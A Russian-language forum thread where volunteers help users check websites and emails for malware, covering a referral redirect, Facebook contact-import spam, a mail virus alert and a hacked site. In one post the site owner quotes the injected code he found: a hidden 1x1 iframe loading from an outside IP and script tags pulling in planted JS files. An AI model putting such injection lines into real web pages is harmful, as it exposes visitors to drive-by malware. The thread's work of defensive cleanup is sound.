Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

akok

Команда форума
Администратор
Ассоциация VN
Сообщения
24,598
Реакции
13,564
  • Первое сообщение
  • #1
Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
  1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
  2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например https://safezone.cc - нужно писать как хттп://safezone.cc)
  3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
  4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

*Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
 
Сайт знает мои персональные данные, взяв их из сети facebook. Ясно, что facebook о конфиденциальности данных особо не беспокоится.
у меня нет фейсбука и никогда не было :p, но иногда приходят сообщения от него. Уже точно не помню, но кажется, что кто-то там меня хочет в друзья добавить :rolleyes:
 
Dragokas, есть один детект у Norman на Redirector.KV, больше пока ни чего сказать не могу, так как сегодня у меня с интернетом проблемы...на страничке есть ссылки на .js, скачай и посмотри, ты же в них разбираешься ;)
 
regist, если не ошибаюсь, то на фейсбуке есть возможность пригласить друзей используя адресную книгу почтового ящика. Так что если у кого-то из друзей есть ваш адрес, то от него и письмо;)
 
Хотелось бы немного информации о вероятности кражи данных аккаунта при переходе по этой ссылке,
и степени других видов опасности - дальнейший спам и пр.
Сайт знает мои персональные данные, взяв их из сети facebook. Ясно, что facebook о конфиденциальности данных особо не беспокоится.
Тут может быть все, от банального фишинга, до "упаривания" зловреда.
 
Dragokas,конечный сайт - hттp://postila.ru/ ,ваша ссылка это реферал (имхо но твёрдое :)) то есть, если товары купят (или что там) по этой ссылке, то хозяину реферала бонус.
Кстати, вы уже видели новый сервис http://vms.drweb.com/online/ (только не смейтесь, проверьте ссылку, сервис классный ;))
перенаправляет на
hттp://postila.ru/user/lp/m/хххххххххххххххххххххххххххх/h/b69741837863417d3dffdg61e97f7?email=2c930afa59bdgdg9db2c441cac4516ed5

(hттp://my.mail.ru/mail/хххххххххххххх - существует)
Я подставил мёртвый адрес и редиректнулся.
 
Последнее редактирование модератором:
Phoenix, читаем шапку темы и не всталяем на форуме активные потенциально вредоносные ссылки!

UPD
. ссылки выше подправил убрав личную информацию.
 
Последнее редактирование:
Phoenix, просьба также предварительно согласовывать выкладывание в открытый доступ дешифрованных персональных данных.
Спасибо.
 
иногда приходят сообщения от него. Уже точно не помню, но кажется, что кто-то там меня хочет в друзья добавить

Сайт знает мои персональные данные, взяв их из сети facebook. Ясно, что facebook о конфиденциальности данных особо не беспокоится.

Это немного не так. Там есть предлагаемая возможность пригласить друзей и абонентов, используя ваш адрес email, который был введен при регистрации на FB. С точки зрения тех.администрации это простой процесс создать аудиторию для себя лично и для созданных вами групп.
Действует этот так. Предложение "Пригласите друзей, используя email" вылезает очень часто, кто-то по незнанию или по осознанному желанию ответил на это предложение и ввел пароль от своей почты в предлагаемое поле. После этого FB автоматом авторизуется в его почте, считывает там адресную книгу — контакты адресатов и абонентов, которые вам присылали почту и получали её от вас.



Не скажу, что FB самая защищенная сеть, но конфиденциальности там уделяется немало времени. Именно из-за этого FB довольно "туг на ухо". Но имеется возможность защищить свою учетную запись специальными решениями разработчиков средств безопасности. Это можно, например, сделать из программ Norton, или подключить специальное приложение Norton Safe Web, чтобы выполнялся Norton Auto-Scan.
 
Забыл сказать, что для того, чтобы подключить специальное приложение Norton Safe Web, не обязательно быть пользователем программ Нортон. Но именно это приложение действует наиболее эффективно в плане защиты и фильтрации спама. Потому у тебя нет ни спама, не левых поползновений и никто не жалуется на твою учетку, действующую самовольно.
Вот страница самого приложения NSW в FB: https://apps.facebook.com/nortonsafeweb/
А вот другие приложения (игры, календарь и пр. пр.) после подключения к вам получают монопольный доступ к вашему аккаунту и от вашего имени могут рассылать приглашения. Впрочем, так не только в FB, но только FB честно предупреждает об этом при добавлении приложения. В других соц.сетях этого предупреждения может и не быть, а суть та же, приложение будет надоедать и спамить за вас.
 
Последнее редактирование:
Добрый день!

Сегодня пришло на почту следующее письмо:
Отправитель: "Voicemail" <admin@ledgo.ru>
Тема: [VIRUS] Voicemail Message
Дата: 18 ноября 2013 г., 13:04:11 GMT+4
Получатель: maslov@ledgo.ru

The attached message from Voicemail <admin@ledgo.ru>
was found to contain the virus "Sanesecurity.Malware.22801.ZipHeur.UNOFFICIAL(7cc92d5b83b12 b9ddb82abd377e9f992:7106)".
The infected portion of the message was removed by Virus Blocker.
Значит ли это, что на сайте появился новый вирус?

Сайт ledgo.ru.

А еще постоянно (с интервалом 15 минут) приходят на почту письма такого содержания:
Отправитель: root@bitrix118.timeweb.ru (Cron Daemon)
Тема: Cron <talipov@bitrix118> /usr/local/bin/php /home/t/talipov/mega-shara/public_html/autobacup.php
Дата: 15 ноября 2013 г., 13:15:01 GMT+4
Получатель: ilgam@ledgo.ru

Could not open input file: /home/t/talipov/mega-shara/public_html/autobacup.php
Что это и как с этим бороться?
 
Последнее редактирование:
Тема: Cron <talipov@bitrix118> /usr/local/bin/php /home/t/talipov/mega-shara/public_html/autobacup.php
Проверьте наличие файла, cron не может его найти и шлет ошибки.


Значит ли это, что на сайте появился новый вирус?

Не факт, проверьте, что рассылает форум. Срабатывание идет именно на почтовые сообщения.
 
Привет, друзья. Вновь обращаюсь к вам за подсказкой в поиске вредоносного кода...
Гугл считает сайт зараженным. Помогите, плиз, отыскать заразу.
Причём непонятно как вредоносный код мог попасть на сайт, если к сайту блокирован доступ по ФТП...

Сайт хттп://rhl-mod.ru
 
regist, я всю эту информацию от гугла изучил и мне понятно, что сайт взломали с целью распространения чего-то вредоносного. Но вот на какие кокретно строки в коде идёт реакция от гугла? Надеюсь, что мне профи подскажут...
 
Спасибо!
Опять счётчик) Помню однажды этот счётчик меня уже подводил, но не думаю что только в счётчике дело, т.к Akok правильно предположил что на сайте может быть шелл.

Сам я не бездействую ни в коем случае, у меня вот такая информация:
В некоторые страницы и скрипты сайта в конец дописывали такую строку:
document.write('<iframe src="хттп://5.63.152.144/?id=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>');

Также вызывались ещё подсаженные js
;document.write("<scr"+"ipt src='/images/regimage/backgrounds/dbzgt.js'><"+"/script>");
;document.write("<scr"+"ipt src='/images/pagination/alley.js'><"+"/script>");
Если надо - могу содержание этих js выложить, там много кода

Сейчас я это вычистил, левые js удалил. Но я уверен что это всё появится снова. Найти шелл пока не получается, т.к ищу вручную, а файлов довольно много. Вирус судя по всему какой-то злостный, а я далеко не матёрый борец с вирусами)
 
Последнее редактирование:
S10, ещё подозрительно что при попытке зайти на ваш сайт (хттп://rhl-mod.ru) подряд происходит два редиректа (сначала на rhl-mod.ru/content.php?s=f9cb94c2f7b20cb8d469af93737a3a95 потом на rhl-mod.ru/content) - .htaccess рекомендую проверить, а так никакого shell-a не заметил там.
 
Последнее редактирование:
Да, парни, счётчики я убрал пока что. Но это тоже тема для разговора почему собсно коды счётчиков заражаются... Это же лайвинтернет - безобидный сервис по идее... Второй раз такое со счётчиками. Причём в первом случае ругался только яндекс, теперь только гугл)
---------------
regist, может содержимое хтакцесс прислать? Но в таком виде там такие редиректы не прописаны. Это обилие букв после content.php - это может быть какая-нибудь вирусоопасная зашифровка?
 
Назад
Сверху Снизу